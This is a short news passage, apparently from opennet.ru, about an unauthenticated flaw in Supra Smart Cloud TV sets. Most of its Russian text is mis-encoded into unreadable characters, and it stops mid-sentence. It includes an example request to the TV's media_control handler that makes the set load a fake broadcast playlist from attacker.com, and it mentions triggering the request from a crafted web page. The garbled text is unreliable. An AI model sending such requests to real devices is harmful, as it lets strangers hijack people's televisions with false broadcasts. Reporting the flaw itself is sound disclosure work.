ะ ัะตะปะตะฒะธะทะพัะฐั
Supra Smart Cloud TV
ะะปั ะฐัะฐะบะธ ะดะพััะฐัะพัะฝะพ ะพัะฟัะฐะฒะธัั ัะฟะตัะธะฐะปัะฝะพ ะพัะพัะผะปะตะฝะฝัะน ัะตัะตะฒะพะน ะทะฐะฟัะพั, ะฝะต ััะตะฑัััะธะน ะฐััะตะฝัะธัะธะบะฐัะธะธ. ะ ัะฐััะฝะพััะธ, ะผะพะถะฝะพ ะพะฑัะฐัะธัััั ะบ ะพะฑัะฐะฑะพััะธะบั ยซ/remote/media_control?action=setUri&uri=ยป ัะบะฐะทะฐะฒ URL m3u8-ัะฐะนะปะฐ ั ะฟะฐัะฐะผะตััะฐะผะธ ะฒะธะดะตะพ, ะฝะฐะฟัะธะผะตั ยซhttp://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8ยป.
ะ ะฑะพะปััะธะฝััะฒะต ัะปััะฐะตะฒ ะดะพัััะฟ ะบ IP-ะฐะดัะตัั ัะตะปะตะฒะธะทะพัะฐ ะพะณัะฐะฝะธัะตะฝ ะฒะฝัััะตะฝะฝะตะน ัะตััั, ะฝะพ ัะฐะบ ะบะฐะบ ะทะฐะฟัะพั ะพัะฟัะฐะฒะปัะตััั ัะตัะตะท HTTP ะฒะพะทะผะพะถะฝะพ ะฟัะธะผะตะฝะตะฝะธะต ะผะตัะพะดะพะฒ ะดะปั ะพะฑัะฐัะตะฝะธั ะบ ะฒะฝัััะตะฝะฝะธะผ ัะตััััะฐะผ ะฟัะธ ะพัะบัััะธะธ ะฟะพะปัะทะพะฒะฐัะตะปะตะผ ัะฟะตัะธะฐะปัะฝะพ ะพัะพัะผะปะตะฝะฝะพะน ะฒะฝะตัะฝะตะน ัััะฐะฝะธัั (ะฝะฐะฟัะธะผะตั, ะฟะพะด ะฒะธะดะพะผ ะทะฐะฟัะพัะฐ ะบะฐััะธะฝะบะธ ะธะปะธ ะธัะฟะพะปัะทัั ะผะตัะพะด
เปเบซเบผเปเบเบเปเปเบกเบนเบ: opennet.ru